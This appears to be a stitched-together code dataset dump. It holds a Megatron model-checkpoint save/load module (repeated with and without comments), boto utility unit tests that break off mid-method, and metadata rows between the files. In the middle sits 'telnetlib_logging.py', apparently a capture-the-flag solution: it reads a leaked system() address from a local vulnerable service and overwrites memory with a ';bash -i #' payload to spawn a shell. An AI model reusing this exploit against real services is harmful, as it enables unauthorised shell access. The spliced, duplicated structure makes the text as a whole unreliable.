state_dict['model%d' % i] = model[i].state_dict_for_save_checkpoint()
# Optimizer stuff.
if not args.no_save_optim:
if optimizer is not None:
state_dict['optimizer'] = optimizer.state_dict()
if lr_scheduler is not None:
state_dict['lr_scheduler'] = lr_scheduler.state_dict()
# RNG states.
if not args.no_save_rng:
state_dict['random_rng_state'] = random.getstate()
state_dict['np_rng_state'] = np.random.get_state()
state_dict['torch_rng_state'] = torch.get_rng_state()
state_dict['cuda_rng_state'] = torch.cuda.get_rng_state()
state_dict['rng_tracker_states'] \
= mpu.get_cuda_rng_tracker().get_states()
# Save.
checkpoint_name = get_checkpoint_name(args.save, iteration)
if not args.deepspeed:
ensure_directory_exists(checkpoint_name)
torch.save(state_dict, checkpoint_name)
if args.deepspeed:
# Saving is a collective communication
checkpoint_name = get_checkpoint_name(args.save, iteration)
# Trim off the filename and mp_rank_* directory.
for _ in range(3):
checkpoint_name = os.path.dirname(checkpoint_name)
model[0].save_checkpoint(checkpoint_name, client_state=state_dict)
# Wait so everyone is done (necessary)
if torch.distributed.is_initialized():
torch.distributed.barrier()
print_rank_0(' successfully saved checkpoint at iteration {:7d} to {}'.format(
iteration, args.save))
# And update the latest iteration
if not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0:
tracker_filename = get_checkpoint_tracker_filename(args.save)
with open(tracker_filename, 'w') as f:
f.write(str(iteration))
# Wait so everyone is done (not necessary)
if torch.distributed.is_initialized():
torch.distributed.barrier()
# since the code can be exited or aborted in various places we use the checkpoint saving as
# a save saving point for the codecarbon tracker. If the program doesn't run to its normal
# end, then only the data since the last saved checkpoint will be lost.
codecarbon_tracker_flush()
def _transpose_first_dim(t, num_splits, num_splits_first, model):
input_shape = t.size()
# We use a self_attention module but the values extracted aren't
# specific to self attention so should work for cross attention as well
while hasattr(model, 'module'):
model = model.module
attention_module = model.language_model.encoder.layers[0].self_attention
hidden_size_per_attention_head = attention_module.hidden_size_per_attention_head
num_attention_heads_per_partition = attention_module.num_attention_heads_per_partition
if num_splits_first:
"""[num_splits * np * hn, h]
-->(view) [num_splits, np, hn, h]
-->(tranpose) [np, num_splits, hn, h]
-->(view) [np * num_splits * hn, h] """
intermediate_shape = \
(num_splits, num_attention_heads_per_partition,
hidden_size_per_attention_head) + input_shape[1:]
t = t.view(*intermediate_shape)
t = t.transpose(0, 1).contiguous()
else:
"""[np * hn * num_splits, h]
-->(view) [np, hn, num_splits, h]
-->(tranpose) [np, num_splits, hn, h]
-->(view) [np * num_splits * hn, h] """
intermediate_shape = \
(num_attention_heads_per_partition,
hidden_size_per_attention_head, num_splits) +\
input_shape[1:]
t = t.view(*intermediate_shape)
t = t.transpose(1, 2).contiguous()
t = t.view(*input_shape)
return t
def fix_query_key_value_ordering(model, checkpoint_version):
"""Fix up query/key/value matrix ordering if checkpoint
version is smaller than 2.0
"""
if checkpoint_version < 2.0:
if isinstance(model, list):
assert len(model)==1
model = model[0]
for name, param in model.named_parameters():
if name.endswith(('.query_key_value.weight', '.query_key_value.bias')):
if checkpoint_version == 0:
fixed_param = _transpose_first_dim(param.data, 3, True, model)
elif checkpoint_version == 1.0:
fixed_param = _transpose_first_dim(param.data, 3, False, model)
else:
print_rank_0(f"Invalid checkpoint version {checkpoint_version}.")
sys.exit()
param.data.copy_(fixed_param)
if name.endswith(('.key_value.weight', '.key_value.bias')):
if checkpoint_version == 0:
fixed_param = _transpose_first_dim(param.data, 2, True, model)
elif checkpoint_version == 1.0:
fixed_param = _transpose_first_dim(param.data, 2, False, model)
else:
print_rank_0(f"Invalid checkpoint version {checkpoint_version}.")
sys.exit()
param.data.copy_(fixed_param)
print_rank_0(" succesfully fixed query-key-values ordering for"
" checkpoint version {}".format(checkpoint_version))
def load_checkpoint(model, optimizer, lr_scheduler, load_arg='load', strict=True):
"""Load a model checkpoint and return the iteration.
strict (bool): whether to strictly enforce that the keys in
:attr:`state_dict` of the checkpoint match the names of
parameters and buffers in model.
"""
args = get_args()
load_dir = getattr(args, load_arg)
if args.deepspeed:
loaded_dir, state_dict = model[0].load_checkpoint(load_dir)
if loaded_dir is None:
print_rank_0('WARNING: could not find the metadata file {} '.format(
load_dir))
print_rank_0(' will not load any checkpoints and will start from '
'random')
return 0
release = False
else:
model = utils.unwrap_model(model)
# Read the tracker file and set the iteration.
tracker_filename = get_checkpoint_tracker_filename(load_dir)
# If no tracker file, return iretation zero.
if not os.path.isfile(tracker_filename):
print_rank_0('WARNING: could not find the metadata file {} '.format(
tracker_filename))
print_rank_0(' will not load any checkpoints and will start from '
'random')
return 0
# Otherwise, read the tracker file and either set the iteration or
# mark it as a release checkpoint.
iteration = 0
release = False
with open(tracker_filename, 'r') as f:
metastring = f.read().strip()
try:
iteration = int(metastring)
except ValueError:
release = metastring == 'release'
if not release:
print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(
tracker_filename))
sys.exit()
assert iteration > 0 or release, 'error parsing metadata file {}'.format(
tracker_filename)
# Checkpoint.
checkpoint_name = get_checkpoint_name(load_dir, iteration, release)
print_rank_0(f' loading checkpoint from {args.load} at iteration {iteration}')
# Load the checkpoint.
try:
state_dict = torch.load(checkpoint_name, map_location='cpu')
except ModuleNotFoundError:
from megatron.fp16_deprecated import loss_scaler
# For backward compatibility.
print_rank_0(' > deserializing using the old code structure ...')
sys.modules['fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
sys.modules['megatron.fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
state_dict = torch.load(checkpoint_name, map_location='cpu')
sys.modules.pop('fp16.loss_scaler', None)
sys.modules.pop('megatron.fp16.loss_scaler', None)
except BaseException as e:
print_rank_0('could not load the checkpoint')
print_rank_0(e)
sys.exit()
# set checkpoint version
set_checkpoint_version(state_dict.get('checkpoint_version', 0))
# Set iteration.
if args.finetune or release:
iteration = 0
else:
try:
iteration = state_dict['iteration']
except KeyError:
try: # Backward compatible with older checkpoints
iteration = state_dict['total_iters']
except KeyError:
print_rank_0('A metadata file exists but unable to load '
'iteration from checkpoint {}, exiting'.format(
checkpoint_name))
sys.exit()
# Check arguments.
assert args.consumed_train_samples == 0
assert args.consumed_valid_samples == 0
if 'args' in state_dict:
checkpoint_args = state_dict['args']
check_checkpoint_args(checkpoint_args)
args.consumed_train_samples = getattr(checkpoint_args,
'consumed_train_samples', 0)
update_num_microbatches(consumed_samples=args.consumed_train_samples)
args.consumed_valid_samples = getattr(checkpoint_args,
'consumed_valid_samples', 0)
else:
print_rank_0('could not find arguments in the checkpoint ...')
# Model.
if not args.deepspeed:
if len(model) == 1:
model[0].load_state_dict(state_dict['model'], strict=strict)
else:
for i in range(len(model)):
mpu.set_virtual_pipeline_model_parallel_rank(i)
model[i].load_state_dict(state_dict['model%d' % i], strict=strict)
# Fix up query/key/value matrix ordering if needed
checkpoint_version = get_checkpoint_version()
print_rank_0(f' checkpoint version {checkpoint_version}')
fix_query_key_value_ordering(model, checkpoint_version)
# Optimizer.
if not args.deepspeed:
if not release and not args.finetune and not args.no_load_optim:
try:
if optimizer is not None:
optimizer.load_state_dict(state_dict['optimizer'])
if lr_scheduler is not None:
lr_scheduler.load_state_dict(state_dict['lr_scheduler'])
except KeyError:
print_rank_0('Unable to load optimizer from checkpoint {}. '
'Specify --no-load-optim or --finetune to prevent '
'attempting to load the optimizer state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
# rng states.
if not release and not args.finetune and not args.no_load_rng:
try:
random.setstate(state_dict['random_rng_state'])
np.random.set_state(state_dict['np_rng_state'])
torch.set_rng_state(state_dict['torch_rng_state'])
torch.cuda.set_rng_state(state_dict['cuda_rng_state'])
# Check for empty states array
if not state_dict['rng_tracker_states']:
raise KeyError
mpu.get_cuda_rng_tracker().set_states(
state_dict['rng_tracker_states'])
except KeyError:
print_rank_0('Unable to load rng state from checkpoint {}. '
'Specify --no-load-rng or --finetune to prevent '
'attempting to load the rng state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
# Some utilities want to load a checkpoint without distributed being initialized
if torch.distributed.is_initialized():
torch.distributed.barrier()
print_rank_0(f' successfully loaded checkpoint from {args.load} '
f'at iteration {iteration}')
return iteration
def load_biencoder_checkpoint(model, only_query_model=False,
only_context_model=False, custom_load_path=None):
"""
selectively load retrieval models for indexing/retrieving
from saved checkpoints
"""
args = get_args()
model = utils.unwrap_model(model)
load_path = custom_load_path if custom_load_path is not None else args.load
tracker_filename = get_checkpoint_tracker_filename(load_path)
with open(tracker_filename, 'r') as f:
iteration = int(f.read().strip())
checkpoint_name = get_checkpoint_name(load_path, iteration, False)
if mpu.get_data_parallel_rank() == 0:
print('global rank {} is loading checkpoint {}'.format(
torch.distributed.get_rank(), checkpoint_name))
state_dict = torch.load(checkpoint_name, map_location='cpu')
ret_state_dict = state_dict['model']
if only_query_model:
ret_state_dict.pop('context_model')
if only_context_model:
ret_state_dict.pop('query_model')
assert len(model) == 1
model[0].load_state_dict(ret_state_dict)
torch.distributed.barrier()
if mpu.get_data_parallel_rank() == 0:
print(' successfully loaded {}'.format(checkpoint_name))
return model
| 39.980477 | 95 | 0.629646 |
import os
import random
import sys
import numpy as np
import torch
from megatron.global_vars import codecarbon_tracker_flush
from megatron import (get_args,
mpu,
print_rank_0,
update_num_microbatches,
utils)
_CHECKPOINT_VERSION = None
def set_checkpoint_version(value):
global _CHECKPOINT_VERSION
if _CHECKPOINT_VERSION is not None:
assert _CHECKPOINT_VERSION == value, \
"checkpoint versions do not match"
_CHECKPOINT_VERSION = value
def get_checkpoint_version():
global _CHECKPOINT_VERSION
return _CHECKPOINT_VERSION
def check_checkpoint_args(checkpoint_args):
args = get_args()
def _compare(arg_name, old_arg_name=None):
if old_arg_name is not None:
checkpoint_value = getattr(checkpoint_args, old_arg_name)
else:
checkpoint_value = getattr(checkpoint_args, arg_name)
args_value = getattr(args, arg_name)
error_message = '{} value from checkpoint ({}) is not equal to the ' \
'input argument value ({}).'.format(
arg_name, checkpoint_value, args_value)
assert checkpoint_value == args_value, error_message
_compare('num_layers')
_compare('hidden_size')
_compare('num_attention_heads')
_compare('max_position_embeddings')
_compare('position_embedding_type')
if args.vocab_file:
_compare('make_vocab_size_divisible_by')
_compare('padded_vocab_size')
_compare('tokenizer_type')
if get_checkpoint_version() < 3.0:
_compare('tensor_model_parallel_size',
old_arg_name='model_parallel_size')
if get_checkpoint_version() >= 3.0:
_compare('tensor_model_parallel_size')
_compare('pipeline_model_parallel_size')
def ensure_directory_exists(filename):
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
def get_checkpoint_name(checkpoints_path, iteration,
release=False):
if release:
directory = 'release'
else:
directory = 'iter_{:07d}'.format(iteration)
if mpu.get_pipeline_model_parallel_world_size() == 1:
return os.path.join(checkpoints_path, directory,
'mp_rank_{:02d}'.format(
mpu.get_tensor_model_parallel_rank()),
'model_optim_rng.pt')
return os.path.join(checkpoints_path, directory,
'mp_rank_{:02d}_{:03d}'.format(
mpu.get_tensor_model_parallel_rank(),
mpu.get_pipeline_model_parallel_rank()),
'model_optim_rng.pt')
def get_checkpoint_tracker_filename(checkpoints_path):
return os.path.join(checkpoints_path, 'latest_checkpointed_iteration.txt')
def save_checkpoint(iteration, model, optimizer, lr_scheduler):
args = get_args()
if not args.deepspeed:
model = utils.unwrap_model(model)
print_rank_0('saving checkpoint at iteration {:7d} to {}'.format(
iteration, args.save))
if not torch.distributed.is_initialized() or mpu.get_data_parallel_rank() == 0 \
or args.deepspeed:
state_dict = {}
state_dict['args'] = args
state_dict['checkpoint_version'] = 3.0
state_dict['iteration'] = iteration
if not args.deepspeed:
if len(model) == 1:
state_dict['model'] = model[0].state_dict_for_save_checkpoint()
else:
for i in range(len(model)):
mpu.set_virtual_pipeline_model_parallel_rank(i)
state_dict['model%d' % i] = model[i].state_dict_for_save_checkpoint()
if not args.no_save_optim:
if optimizer is not None:
state_dict['optimizer'] = optimizer.state_dict()
if lr_scheduler is not None:
state_dict['lr_scheduler'] = lr_scheduler.state_dict()
if not args.no_save_rng:
state_dict['random_rng_state'] = random.getstate()
state_dict['np_rng_state'] = np.random.get_state()
state_dict['torch_rng_state'] = torch.get_rng_state()
state_dict['cuda_rng_state'] = torch.cuda.get_rng_state()
state_dict['rng_tracker_states'] \
= mpu.get_cuda_rng_tracker().get_states()
checkpoint_name = get_checkpoint_name(args.save, iteration)
if not args.deepspeed:
ensure_directory_exists(checkpoint_name)
torch.save(state_dict, checkpoint_name)
if args.deepspeed:
checkpoint_name = get_checkpoint_name(args.save, iteration)
for _ in range(3):
checkpoint_name = os.path.dirname(checkpoint_name)
model[0].save_checkpoint(checkpoint_name, client_state=state_dict)
if torch.distributed.is_initialized():
torch.distributed.barrier()
print_rank_0(' successfully saved checkpoint at iteration {:7d} to {}'.format(
iteration, args.save))
if not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0:
tracker_filename = get_checkpoint_tracker_filename(args.save)
with open(tracker_filename, 'w') as f:
f.write(str(iteration))
if torch.distributed.is_initialized():
torch.distributed.barrier()
# end, then only the data since the last saved checkpoint will be lost.
codecarbon_tracker_flush()
def _transpose_first_dim(t, num_splits, num_splits_first, model):
input_shape = t.size()
# We use a self_attention module but the values extracted aren't
while hasattr(model, 'module'):
model = model.module
attention_module = model.language_model.encoder.layers[0].self_attention
hidden_size_per_attention_head = attention_module.hidden_size_per_attention_head
num_attention_heads_per_partition = attention_module.num_attention_heads_per_partition
if num_splits_first:
intermediate_shape = \
(num_splits, num_attention_heads_per_partition,
hidden_size_per_attention_head) + input_shape[1:]
t = t.view(*intermediate_shape)
t = t.transpose(0, 1).contiguous()
else:
"""[np * hn * num_splits, h]
-->(view) [np, hn, num_splits, h]
-->(tranpose) [np, num_splits, hn, h]
-->(view) [np * num_splits * hn, h] """
intermediate_shape = \
(num_attention_heads_per_partition,
hidden_size_per_attention_head, num_splits) +\
input_shape[1:]
t = t.view(*intermediate_shape)
t = t.transpose(1, 2).contiguous()
t = t.view(*input_shape)
return t
def fix_query_key_value_ordering(model, checkpoint_version):
if checkpoint_version < 2.0:
if isinstance(model, list):
assert len(model)==1
model = model[0]
for name, param in model.named_parameters():
if name.endswith(('.query_key_value.weight', '.query_key_value.bias')):
if checkpoint_version == 0:
fixed_param = _transpose_first_dim(param.data, 3, True, model)
elif checkpoint_version == 1.0:
fixed_param = _transpose_first_dim(param.data, 3, False, model)
else:
print_rank_0(f"Invalid checkpoint version {checkpoint_version}.")
sys.exit()
param.data.copy_(fixed_param)
if name.endswith(('.key_value.weight', '.key_value.bias')):
if checkpoint_version == 0:
fixed_param = _transpose_first_dim(param.data, 2, True, model)
elif checkpoint_version == 1.0:
fixed_param = _transpose_first_dim(param.data, 2, False, model)
else:
print_rank_0(f"Invalid checkpoint version {checkpoint_version}.")
sys.exit()
param.data.copy_(fixed_param)
print_rank_0(" succesfully fixed query-key-values ordering for"
" checkpoint version {}".format(checkpoint_version))
def load_checkpoint(model, optimizer, lr_scheduler, load_arg='load', strict=True):
args = get_args()
load_dir = getattr(args, load_arg)
if args.deepspeed:
loaded_dir, state_dict = model[0].load_checkpoint(load_dir)
if loaded_dir is None:
print_rank_0('WARNING: could not find the metadata file {} '.format(
load_dir))
print_rank_0(' will not load any checkpoints and will start from '
'random')
return 0
release = False
else:
model = utils.unwrap_model(model)
tracker_filename = get_checkpoint_tracker_filename(load_dir)
if not os.path.isfile(tracker_filename):
print_rank_0('WARNING: could not find the metadata file {} '.format(
tracker_filename))
print_rank_0(' will not load any checkpoints and will start from '
'random')
return 0
iteration = 0
release = False
with open(tracker_filename, 'r') as f:
metastring = f.read().strip()
try:
iteration = int(metastring)
except ValueError:
release = metastring == 'release'
if not release:
print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(
tracker_filename))
sys.exit()
assert iteration > 0 or release, 'error parsing metadata file {}'.format(
tracker_filename)
checkpoint_name = get_checkpoint_name(load_dir, iteration, release)
print_rank_0(f' loading checkpoint from {args.load} at iteration {iteration}')
try:
state_dict = torch.load(checkpoint_name, map_location='cpu')
except ModuleNotFoundError:
from megatron.fp16_deprecated import loss_scaler
print_rank_0(' > deserializing using the old code structure ...')
sys.modules['fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
sys.modules['megatron.fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
state_dict = torch.load(checkpoint_name, map_location='cpu')
sys.modules.pop('fp16.loss_scaler', None)
sys.modules.pop('megatron.fp16.loss_scaler', None)
except BaseException as e:
print_rank_0('could not load the checkpoint')
print_rank_0(e)
sys.exit()
set_checkpoint_version(state_dict.get('checkpoint_version', 0))
if args.finetune or release:
iteration = 0
else:
try:
iteration = state_dict['iteration']
except KeyError:
try:
iteration = state_dict['total_iters']
except KeyError:
print_rank_0('A metadata file exists but unable to load '
'iteration from checkpoint {}, exiting'.format(
checkpoint_name))
sys.exit()
assert args.consumed_train_samples == 0
assert args.consumed_valid_samples == 0
if 'args' in state_dict:
checkpoint_args = state_dict['args']
check_checkpoint_args(checkpoint_args)
args.consumed_train_samples = getattr(checkpoint_args,
'consumed_train_samples', 0)
update_num_microbatches(consumed_samples=args.consumed_train_samples)
args.consumed_valid_samples = getattr(checkpoint_args,
'consumed_valid_samples', 0)
else:
print_rank_0('could not find arguments in the checkpoint ...')
if not args.deepspeed:
if len(model) == 1:
model[0].load_state_dict(state_dict['model'], strict=strict)
else:
for i in range(len(model)):
mpu.set_virtual_pipeline_model_parallel_rank(i)
model[i].load_state_dict(state_dict['model%d' % i], strict=strict)
checkpoint_version = get_checkpoint_version()
print_rank_0(f' checkpoint version {checkpoint_version}')
fix_query_key_value_ordering(model, checkpoint_version)
if not args.deepspeed:
if not release and not args.finetune and not args.no_load_optim:
try:
if optimizer is not None:
optimizer.load_state_dict(state_dict['optimizer'])
if lr_scheduler is not None:
lr_scheduler.load_state_dict(state_dict['lr_scheduler'])
except KeyError:
print_rank_0('Unable to load optimizer from checkpoint {}. '
'Specify --no-load-optim or --finetune to prevent '
'attempting to load the optimizer state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
if not release and not args.finetune and not args.no_load_rng:
try:
random.setstate(state_dict['random_rng_state'])
np.random.set_state(state_dict['np_rng_state'])
torch.set_rng_state(state_dict['torch_rng_state'])
torch.cuda.set_rng_state(state_dict['cuda_rng_state'])
if not state_dict['rng_tracker_states']:
raise KeyError
mpu.get_cuda_rng_tracker().set_states(
state_dict['rng_tracker_states'])
except KeyError:
print_rank_0('Unable to load rng state from checkpoint {}. '
'Specify --no-load-rng or --finetune to prevent '
'attempting to load the rng state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
if torch.distributed.is_initialized():
torch.distributed.barrier()
print_rank_0(f' successfully loaded checkpoint from {args.load} '
f'at iteration {iteration}')
return iteration
def load_biencoder_checkpoint(model, only_query_model=False,
only_context_model=False, custom_load_path=None):
args = get_args()
model = utils.unwrap_model(model)
load_path = custom_load_path if custom_load_path is not None else args.load
tracker_filename = get_checkpoint_tracker_filename(load_path)
with open(tracker_filename, 'r') as f:
iteration = int(f.read().strip())
checkpoint_name = get_checkpoint_name(load_path, iteration, False)
if mpu.get_data_parallel_rank() == 0:
print('global rank {} is loading checkpoint {}'.format(
torch.distributed.get_rank(), checkpoint_name))
state_dict = torch.load(checkpoint_name, map_location='cpu')
ret_state_dict = state_dict['model']
if only_query_model:
ret_state_dict.pop('context_model')
if only_context_model:
ret_state_dict.pop('query_model')
assert len(model) == 1
model[0].load_state_dict(ret_state_dict)
torch.distributed.barrier()
if mpu.get_data_parallel_rank() == 0:
print(' successfully loaded {}'.format(checkpoint_name))
return model
| true | true |
f7328e07aa94a65699960aed21b01b92175dfc88 | 1,011 | py | Python | random_stuff/telnetlib_logging.py | adw1n/competitive-programming | b28a166e7c93d7b239c0a6b09eafd6020685afdf | [
"WTFPL"
] | null | null | null | random_stuff/telnetlib_logging.py | adw1n/competitive-programming | b28a166e7c93d7b239c0a6b09eafd6020685afdf | [
"WTFPL"
] | null | null | null | random_stuff/telnetlib_logging.py | adw1n/competitive-programming | b28a166e7c93d7b239c0a6b09eafd6020685afdf | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python3
import telnetlib
import struct
import logging
HOST="localhost"
#while true; do nc -l -p 1111 -e /tmp/vuln; done
old_write=telnetlib.Telnet.write
def write(self, str_: bytes):
try:
print("w: ",str_.decode("utf-8"))
except UnicodeDecodeError:
print("w: ",str_)
old_write(self,str_)
telnetlib.Telnet.write=write
old_read_until=telnetlib.Telnet.read_until
def read_until(self, *args, **kwargs):
s=old_read_until(self,*args, **kwargs)
try:
print("r: ", s.decode("utf-8"))
except UnicodeDecodeError:
print("r: ",s)
return s
telnetlib.Telnet.read_until=read_until
tn = telnetlib.Telnet(HOST,1111)
tn.read_until(match=b": ")
tn.write(b"4\n")
help_txt=tn.read_until(match=b": ")
system=help_txt.decode("utf-8").split("- ")[1].split("\n")[0]
system=int(system,16)
tn.write(b"1\n")
tn.read_until(match=b": ")
system=struct.pack("I",system)
tn.write(b";bash -i #\x00\x00\x00\x00"+system+b"\n")
print("enjoy the shell")
tn.interact()
| 23.511628 | 61 | 0.67458 |
import telnetlib
import struct
import logging
HOST="localhost"
old_write=telnetlib.Telnet.write
def write(self, str_: bytes):
try:
print("w: ",str_.decode("utf-8"))
except UnicodeDecodeError:
print("w: ",str_)
old_write(self,str_)
telnetlib.Telnet.write=write
old_read_until=telnetlib.Telnet.read_until
def read_until(self, *args, **kwargs):
s=old_read_until(self,*args, **kwargs)
try:
print("r: ", s.decode("utf-8"))
except UnicodeDecodeError:
print("r: ",s)
return s
telnetlib.Telnet.read_until=read_until
tn = telnetlib.Telnet(HOST,1111)
tn.read_until(match=b": ")
tn.write(b"4\n")
help_txt=tn.read_until(match=b": ")
system=help_txt.decode("utf-8").split("- ")[1].split("\n")[0]
system=int(system,16)
tn.write(b"1\n")
tn.read_until(match=b": ")
system=struct.pack("I",system)
tn.write(b";bash -i #\x00\x00\x00\x00"+system+b"\n")
print("enjoy the shell")
tn.interact()
| true | true |
f7328e7d8e965d4fc8718dd18bf2b119145af16a | 9,759 | py | Python | platform/gsutil/third_party/boto/tests/unit/utils/test_utils.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | [
"Apache-2.0"
] | 1 | 2021-04-30T05:26:20.000Z | 2021-04-30T05:26:20.000Z | platform/gsutil/third_party/boto/tests/unit/utils/test_utils.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | [
"Apache-2.0"
] | null | null | null | platform/gsutil/third_party/boto/tests/unit/utils/test_utils.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | [
"Apache-2.0"
] | 2 | 2020-07-25T05:03:06.000Z | 2020-11-04T04:55:57.000Z | # Copyright (c) 2010 Robert Mela
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
try:
import unittest2 as unittest
except ImportError:
import unittest
import datetime
import hashlib
import hmac
import locale
import mock
import thread
import time
import boto.utils
from boto.utils import Password
from boto.utils import pythonize_name
from boto.utils import _build_instance_metadata_url
from boto.utils import get_instance_userdata
from boto.utils import retry_url
from boto.utils import LazyLoadMetadata
from boto.compat import json
@unittest.skip("http://bugs.python.org/issue7980")
class TestThreadImport(unittest.TestCase):
def test_strptime(self):
def f():
for m in xrange(1, 13):
for d in xrange(1,29):
boto.utils.parse_ts('2013-01-01T00:00:00Z')
for _ in xrange(10):
thread.start_new_thread(f, ())
time.sleep(3)
class TestPassword(unittest.TestCase):
"""Test basic password functionality"""
def clstest(self, cls):
"""Insure that password.__eq__ hashes test value before compare."""
password = cls('foo')
self.assertNotEquals(password, 'foo')
password.set('foo')
hashed = str(password)
self.assertEquals(password, 'foo')
self.assertEquals(password.str, hashed)
password = cls(hashed)
self.assertNotEquals(password.str, 'foo')
self.assertEquals(password, 'foo')
self.assertEquals(password.str, hashed)
def test_aaa_version_1_9_default_behavior(self):
self.clstest(Password)
def test_custom_hashclass(self):
class SHA224Password(Password):
hashfunc = hashlib.sha224
password = SHA224Password()
password.set('foo')
self.assertEquals(hashlib.sha224('foo').hexdigest(), str(password))
def test_hmac(self):
def hmac_hashfunc(cls, msg):
return hmac.new('mysecretkey', msg)
class HMACPassword(Password):
hashfunc = hmac_hashfunc
self.clstest(HMACPassword)
password = HMACPassword()
password.set('foo')
self.assertEquals(str(password),
hmac.new('mysecretkey', 'foo').hexdigest())
def test_constructor(self):
hmac_hashfunc = lambda msg: hmac.new('mysecretkey', msg)
password = Password(hashfunc=hmac_hashfunc)
password.set('foo')
self.assertEquals(password.str,
hmac.new('mysecretkey', 'foo').hexdigest())
class TestPythonizeName(unittest.TestCase):
def test_empty_string(self):
self.assertEqual(pythonize_name(''), '')
def test_all_lower_case(self):
self.assertEqual(pythonize_name('lowercase'), 'lowercase')
def test_all_upper_case(self):
self.assertEqual(pythonize_name('UPPERCASE'), 'uppercase')
def test_camel_case(self):
self.assertEqual(pythonize_name('OriginallyCamelCased'),
'originally_camel_cased')
def test_already_pythonized(self):
self.assertEqual(pythonize_name('already_pythonized'),
'already_pythonized')
def test_multiple_upper_cased_letters(self):
self.assertEqual(pythonize_name('HTTPRequest'), 'http_request')
self.assertEqual(pythonize_name('RequestForHTTP'), 'request_for_http')
def test_string_with_numbers(self):
self.assertEqual(pythonize_name('HTTPStatus200Ok'), 'http_status_200_ok')
class TestBuildInstanceMetadataURL(unittest.TestCase):
def test_normal(self):
# This is the all-defaults case.
self.assertEqual(_build_instance_metadata_url(
'http://169.254.169.254',
'latest',
'meta-data/'
),
'http://169.254.169.254/latest/meta-data/'
)
def test_custom_path(self):
self.assertEqual(_build_instance_metadata_url(
'http://169.254.169.254',
'latest',
'dynamic/'
),
'http://169.254.169.254/latest/dynamic/'
)
def test_custom_version(self):
self.assertEqual(_build_instance_metadata_url(
'http://169.254.169.254',
'1.0',
'meta-data/'
),
'http://169.254.169.254/1.0/meta-data/'
)
def test_custom_url(self):
self.assertEqual(_build_instance_metadata_url(
'http://10.0.1.5',
'latest',
'meta-data/'
),
'http://10.0.1.5/latest/meta-data/'
)
def test_all_custom(self):
self.assertEqual(_build_instance_metadata_url(
'http://10.0.1.5',
'2013-03-22',
'user-data'
),
'http://10.0.1.5/2013-03-22/user-data'
)
class TestRetryURL(unittest.TestCase):
def setUp(self):
self.urlopen_patch = mock.patch('urllib2.urlopen')
self.opener_patch = mock.patch('urllib2.build_opener')
self.urlopen = self.urlopen_patch.start()
self.opener = self.opener_patch.start()
def tearDown(self):
self.urlopen_patch.stop()
self.opener_patch.stop()
def set_normal_response(self, response):
fake_response = mock.Mock()
fake_response.read.return_value = response
self.urlopen.return_value = fake_response
def set_no_proxy_allowed_response(self, response):
fake_response = mock.Mock()
fake_response.read.return_value = response
self.opener.return_value.open.return_value = fake_response
def test_retry_url_uses_proxy(self):
self.set_normal_response('normal response')
self.set_no_proxy_allowed_response('no proxy response')
response = retry_url('http://10.10.10.10/foo', num_retries=1)
self.assertEqual(response, 'no proxy response')
class TestLazyLoadMetadata(unittest.TestCase):
def setUp(self):
self.retry_url_patch = mock.patch('boto.utils.retry_url')
boto.utils.retry_url = self.retry_url_patch.start()
def tearDown(self):
self.retry_url_patch.stop()
def set_normal_response(self, data):
# here "data" should be a list of return values in some order
fake_response = mock.Mock()
fake_response.side_effect = data
boto.utils.retry_url = fake_response
def test_meta_data_with_invalid_json_format_happened_once(self):
# here "key_data" will be stored in the "self._leaves"
# when the class "LazyLoadMetadata" initialized
key_data = "test"
invalid_data = '{"invalid_json_format" : true,}'
valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
url = "/".join(["http://169.254.169.254", key_data])
num_retries = 2
self.set_normal_response([key_data, invalid_data, valid_data])
response = LazyLoadMetadata(url, num_retries)
self.assertEqual(response.values()[0], json.loads(valid_data))
def test_meta_data_with_invalid_json_format_happened_twice(self):
key_data = "test"
invalid_data = '{"invalid_json_format" : true,}'
valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
url = "/".join(["http://169.254.169.254", key_data])
num_retries = 2
self.set_normal_response([key_data, invalid_data, invalid_data])
response = LazyLoadMetadata(url, num_retries)
with self.assertRaises(ValueError):
response.values()[0]
def test_user_data(self):
self.set_normal_response(['foo'])
userdata = get_instance_userdata()
self.assertEqual('foo', userdata)
boto.utils.retry_url.assert_called_with(
'http://169.254.169.254/latest/user-data',
retry_on_404=False)
class TestStringToDatetimeParsing(unittest.TestCase):
""" Test string to datetime parsing """
def setUp(self):
self._saved = locale.setlocale(locale.LC_ALL)
locale.setlocale(locale.LC_ALL, 'de_DE.UTF-8')
def tearDown(self):
